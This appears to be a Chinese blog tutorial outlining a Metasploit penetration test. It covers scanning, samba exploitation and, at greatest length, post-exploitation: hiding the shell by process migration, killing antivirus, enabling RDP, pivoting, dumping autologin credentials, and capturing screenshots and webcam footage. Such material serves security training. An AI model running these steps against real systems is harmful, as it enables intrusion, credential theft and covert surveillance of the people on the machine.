Metasploit系列操作

MSF渗透测试大致步骤:

1.扫描目标系统,寻找可用漏洞
2.选择并配置一个漏洞利用模块
3.选择并配置一个攻击载荷
4.选择一个编码技术,用来绕过杀毒软件
5.渗透攻击

1.使用辅助模块进行端口扫描

search portsacn
use  xxxxx
show options
设置必须的属性值(set PORTS 1-10000,....)

2.使用辅助模块进行服务 扫描

搜索扫描模块:search scanner
使用Nmap进行扫描:
绕过防火墙进行扫扫描主机系统
nmap -Pn -O 192.168.0.110

3.漏洞利用

通过观察打开的端口以及服务及版本搜索对应的漏洞利用模块(以samba服务为例)
search samba
对于漏洞利用列表,排前面的漏洞利用成功几率较高
查看漏洞利用信息:info exploit/xxxxx
使用该漏洞利用:use exploit/xxxxx
查看攻击载荷:show payloads
设置payload:set PAYLOAD cmd/unix/xxx
show options
设置必须属性(设置攻击机ip,被攻击机ip,端口...)
run

4.shell后利用

MSf发动攻击之后会获取目标主机的shell
  • 进程迁移,稳定shell:
在使用MSf获取的shell不够稳定,需要把它与目标系统的一个稳定进程绑定在一起,这样既不用对磁盘进行写入操作,也不容易被发现
查看目标系统的进程:ps
查看当前shell的进程号(984):getpid
将shell的进程迁移到稳定的进程中(448):migrate 448
再次查看当前shell进程(进程以及发生转移):getpid
(如果原进程984没有自动关闭使用自动迁移进程命令 run post/windows/manage/migrate)
  • 信息收集:
查看目标机系统信息: sysinfo/systeminfo 
检查目标是否运行在虚拟机:run post/windows/gather/checkvm
检查目标机是否在运行:idletime
查看路由信息:route
当要控制多个会话时候使用background命令把当前会话放到后台,getuid命令查找以及控制的机器
  • 后续操作
关闭目标杀毒软件: run post/windows/manage/killav
启动目标机的远程桌面协助(3389):
run post/windows/manage/ebable_rdp
查看目标机本地子网情况:
run post/windows/manage/autoroute
将meterpreter隐藏在后台,添加路由并进行查看
background
route add 192.168.172.0 255.255.255.0 1
route print

借助被攻陷的主机对其他网络进行攻击:
列举有多少用户登录了目标机器:
run post/windows/gather/enum_logged_on_users
列举目标机上安装了那些程序:
run post/windows/gather/enum_applications
  • 取证操作:
抓取自动登录用户账号密码:
run windows/gather/credentials/windows_autologin
若未抓取到,则使用Espia扩展插件;先输入load espia命令加载插件;
然后输入screengrab可以抓取目标机的屏幕截图,图片保存在root目录下
load espia
screengrab/screenshot

查看目标有没有摄像头,并打开拍照(保存在root目录下)
wencam_list
webcam_snap
摄像头监控:webcam_stream
访问:file://root/KzIDymVy.html
  • 文件系统命令:
查看目标机处于哪个目录: pwd/getwd(本地)
列出当前目录中的所有文件: ls
切换目录: cd c:\
pwd
搜索c盘中所有的.txt文件:
search -f *.txt -d c:\
下载目标机文件到本地:
download c:\test.txt /root
长传文件到目标机: 
upload /root/test.txt c:/
  • 后渗透攻击:权限提升
纵向提权:低权限用户到高权限用户
横向提权:同级别A角色的权限到B角色权限
进入目标机命令行: shell
查看目标权限: whoami /groups
  • 本地溢出提权:
查看以及获得的权限: getuid
尝试 getsystem 命令提权(一般会失败)
查看系统整体以及补丁情况:systeminfo
也可以用 Wmic 写出补丁情况:
Wmic qfe get Caption,Description,HotFixID,InstalledOn
对相应系统未打补丁情况寻找对于exp提权
background命令将会话放到后台,search 对应的exp利用设置好之后run
getuid查看是否提权成功
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值